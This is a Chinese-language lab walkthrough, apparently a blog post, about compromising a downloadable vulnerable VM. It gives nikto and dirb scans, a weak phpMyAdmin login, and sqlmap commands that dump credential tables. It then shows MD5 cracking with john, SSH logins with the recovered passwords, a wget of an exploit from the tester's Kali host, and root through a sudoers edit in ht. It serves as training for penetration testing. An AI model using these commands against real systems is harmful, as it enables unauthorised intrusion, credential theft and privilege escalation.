kali对未知web server透测试4

环境

主机ip
kaliLinux192.168.101.62(桥接)
靶机-4未知

靶机

https://pan.baidu.com/s/1OdlzNEPNMPw0JHDzyyMBEA
提取码:1234

打开靶机

在这里插入图片描述

渗透测试

主机探测
netdiscover -i eth1 -r 192.168.101.0/24 

在这里插入图片描述
可以看到靶机地址为192.168.101.75

收集信息

在这里插入图片描述
使用dirb目录爆破
在这里插入图片描述
漏洞扫描

nikto -host http://192.168.101.75 

在这里插入图片描述
在这里插入图片描述

访问web界面

在这里插入图片描述
在这里插入图片描述
这里可以看到phpadmin版本
尝试弱密码登录
尝试发现

admin+空密码登录
‘localhost’@'@” +空密码

在这里插入图片描述
判断数据库是否有写权限

show variables like '%secure%';

在这里插入图片描述

secure_file_priv #为空没有写入权限

在这里插入图片描述

show variables like '%datadir%'; #获取数据库路径

在这里插入图片描述
这里用了好几种注入方式,都失败了,这里不再列举。

第二天这里ip发送了一点变化192.168.101.76

查看phpmyadmin日志发现注入点
使用sql注入方式

http://192.168.101.76/gallery/gallery.php?id=1
在这里插入图片描述
我们使用sqlmap 查找数据库

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 --dbs --batch

在这里插入图片描述
查看gallery里的表

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery --tables --batch

在这里插入图片描述
查看dev_accounts内字段

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns --batch

在这里插入图片描述

查找字段值

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C username,password --dump --batch

在这里插入图片描述
这里sqlmap已经把md5值找到了,如果没有就看下面步骤

vim md5.txt
cat md5.txt   
dreg:0d3eccfb887aabd50f243b3f155c0f85
loneferret:5badcaf789d3d1d09794d8f021f40f0e
john --format=raw-MD5 md5.txt也可以直接在网上找

在这里插入图片描述
上面查找数据库可以看到还有个users表
查找gallarific_users表字段

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns --batch

在这里插入图片描述

查询字段值 username,password

sqlmap -u http://192.168.101.76/gallery/gallery.php?id=1 -D gallery -T gallarific_users -C username,password --dump --batch

在这里插入图片描述
因为nmap探测到22端口ssh是开放的可以直接进行登录

ssh dreg@192.168.101.76
输入密码Mast3r

在这里插入图片描述
这里权限不够
在这里插入图片描述
提权
在这里插入图片描述
在这里插入图片描述
下载提权脚本到kali中开启httpd提供下载

在这里插入图片描述

wget http://192.168.101.62/5093.c
gcc 5093.c
./a.out
提权失败了

在这里插入图片描述
换用户登录继续提权

ssh loneferret@192.168.101.76
starwars
export TERM=xterm-color

在这里插入图片描述

sudo ht
按f3输入/etc/sudoers 
回车后
修改loneferret 在末尾加上 ,/bin/bash
F10保存

在这里插入图片描述
在这里插入图片描述

sudo /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)

在这里插入图片描述

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值